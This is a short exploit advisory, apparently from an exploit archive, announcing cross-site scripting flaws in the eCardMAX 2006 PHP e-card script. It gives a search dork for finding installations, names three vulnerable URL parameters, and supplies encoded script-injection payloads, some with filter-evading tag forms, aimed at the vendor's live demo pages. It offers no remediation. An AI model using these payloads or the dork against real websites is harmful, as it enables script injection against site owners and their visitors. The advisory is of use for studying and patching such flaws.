########################################################################### #-----------------------------I AM MUSLIM !!------------------------------# ########################################################################### ============================================================================== _ _ _ _ _ _ / \ | | | | / \ | | | | / _ \ | | | | / _ \ | |_| | / ___ \ | |___ | |___ / ___ \ | _ | IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_| ============================================================================== [»] [!] Coder - Developer HTML / CSS / PHP / Vb6 . [!] ============================================================================== [»] eCardMAX 2006 Remote XSS vulnerability ============================================================================== [»] Script: [ eCardMAX 2006 ] [»] Language: [ PHP ] [»] Download: [ http://ecardmax.com/index.php?step=Invitation ] [»] Founder: [ Moudi ] [»] Thanks to: [ MiZoZ , ZuKa , str0ke , 599em Man...] [»] Team: [ EvilWay ] [»] Dork: [ Powered by eCardMAX 2006 ] [»] Price: [ $99.95 ] ########################################################################### ===[ Exploit XSS vulnerability ]=== [»] http://www.site.com/patch/resource/games/ephotohunt/ephotohunt.php?step=show_ins&cat=[XSS] [»] http://www.site.com/patch/grabber.php?grab_url=[XSS] [»] http://www.site.com/patch/members.php?cs_message=XSS] ===[ Exploit DEMO ONLINE ]=== [»] http://ecardmax.com/standard_2006/grabber.php?grab_url= XSS TO ADD: 1%3Cscript%3Ealert(1192520984065)%3C/script%3E [»] http://ecardmax.com/standard_2006/members.php?cs_message= XSS TO ADD: 1%3C/textarea%3E%3CScRiPt%20%0A%0D%3Ealert(846719933916)%3B%3C/ScRiPt%3E [»] http://ecardmax.com/standard_2006/resource/games/memory/memory.php?step=show_ins&cat= XSS TO ADD:1%3E%22%3E%3CScRiPt%20%0A%0D%3Ealert(1295561226285)%3B%3C/ScRiPt%3E Author: Moudi ###########################################################################